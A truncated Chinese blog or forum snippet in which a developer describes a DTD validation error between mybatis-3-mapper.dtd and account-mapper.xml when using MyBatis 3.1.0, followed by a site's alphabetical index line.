    最近使用mybatis.3.1.0时无意中碰到一个问题: The errors below were detected when validating the file "mybatis-3-mapper.dtd" via the file "account-mapper.xml". In most cases these errors can be d
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他